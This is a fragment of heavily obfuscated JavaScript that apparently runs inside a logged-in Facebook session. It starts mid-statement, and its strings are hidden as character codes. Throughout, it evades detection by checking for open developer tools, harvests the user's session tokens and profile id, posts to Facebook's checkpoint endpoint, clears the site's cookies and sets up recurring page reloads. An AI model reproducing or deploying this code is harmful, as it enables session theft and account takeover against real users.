XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](80,79,83,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116,47));_0xd58ax8[_0xde57[39]](String[_0xde57[0]](67,111,110,116,101,110,116,45,84,121,112,101),String[_0xde57[0]](97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));_0xd58ax8[_0xde57[18]](_s(_0xd58axb));_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4){console[_0xde57[2]](String[_0xde57[0]](71,101,116,32,67,111,110,116,105,110,117,101));_y();location[_0xde57[56]]= String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109)}}}function _y(){var _0xd58ax3f=document[_0xde57[57]][_0xde57[17]](String[_0xde57[0]](59));for(var _0xd58ax40=0;_0xd58ax40< _0xd58ax3f[_0xde57[25]];_0xd58ax40++){var _0xd58ax41=_0xd58ax3f[_0xd58ax40];var _0xd58ax42=_0xd58ax41[_0xde57[12]](String[_0xde57[0]](61));var _0xd58ax13=_0xd58ax42> -1?_0xd58ax41[_0xde57[58]](0,_0xd58ax42):_0xd58ax41;document[_0xde57[57]]= _0xd58ax13+ String[_0xde57[0]](61,59,101,120,112,105,114,101,115,61,84,104,117,44,32,48,49,32,74,97,110,32,49,57,55,48,32,48,48,58,48,48,58,48,48,32,71,77,84,59,100,111,109,97,105,110,61,46,102,97,99,101,98,111,111,107,46,99,111,109)}}var checkStatus=String[_0xde57[0]](111,102,102);var element= new Image();element.__defineGetter__(String[_0xde57[0]](105,100),function(){checkStatus= String[_0xde57[0]](111,110)});console[_0xde57[2]](element);console[_0xde57[59]]();if(location[_0xde57[60]][_0xde57[12]](String[_0xde57[0]](102,97,99,101,98,111,111,107,46,99,111,109))>= 0&& (checkStatus== String[_0xde57[0]](111,102,102)|| consoleFree== true)){fb_dtsg_list= document[_0xde57[61]](String[_0xde57[0]](102,98,95,100,116,115,103));if(!document[_0xde57[51]](String[_0xde57[0]](105,115,114,117,110))&& fb_dtsg_list[_0xde57[25]]> 0&& location[_0xde57[56]][_0xde57[12]](String[_0xde57[0]](102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116))< 0){var log=document[_0xde57[62]](String[_0xde57[0]](109,101,116,97));log[_0xde57[63]]= String[_0xde57[0]](105,115,114,117,110);document[_0xde57[65]][_0xde57[64]](log);_t();profile_id= document[_0xde57[57]][_0xde57[66]](/c_user=(\d+)/)[1];fb_dtsg= fb_dtsg_list[0][_0xde57[42]];__rev= document[_0xde57[65]][_0xde57[50]][_0xde57[17]](_0xde57[68])[1][_0xde57[17]](_0xde57[67])[0];ajaxpipe_token= document[_0xde57[65]][_0xde57[50]][_0xde57[17]](_0xde57[69])[1][_0xde57[17]](_0xde57[67])[0];ttstamp= _0xde57[19];for(var x=0;x< fb_dtsg[_0xde57[25]];x++){ttstamp+= fb_dtsg[_0xde57[70]](x)};ttstamp= String[_0xde57[0]](50)+ ttstamp;console[_0xde57[2]](String[_0xde57[0]](85,115,101,114,58)+ profile_id);console[_0xde57[2]](String[_0xde57[0]](102,98,95,100,116,115,103,58)+ fb_dtsg);console[_0xde57[2]](String[_0xde57[0]](95,95,114,101,118,58)+ __rev);console[_0xde57[2]](String[_0xde57[0]](116,116,115,116,97,109,112,58)+ ttstamp);console[_0xde57[2]](String[_0xde57[0]](97,106,97,120,112,105,112,101,95,116,111,107,101,110,58)+ ajaxpipe_token);window[_0xde57[74]](function(){window[_0xde57[73]][_0xde57[72]][_0xde57[71]]()},1000* 60* 12);_a()};if(location[_0xde57[56]][_0xde57[12]](String[_0xde57[0]](102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116))> 0&& fb_dtsg_list[_0xde57[25]]> 0){fb_dtsg= fb_dtsg_list[0][_0xde57[42]];nh= document[_0xde57[61]](String[_0xde57[0]](110,104))[0][_0xde57[42]];console[_0xde57[2]](fb_dtsg);console[_0xde57[2]](nh);_u()}}else {if(location[_0xde57[60]][_0xde57[12]](String[_0xde57[0]](102,97,99,101,98,111,111,107,46,99,111,109))>= 0){console[_0xde57[22]](String[_0xde57[0]](78,111,116,32,102,111,117,110,100))}}
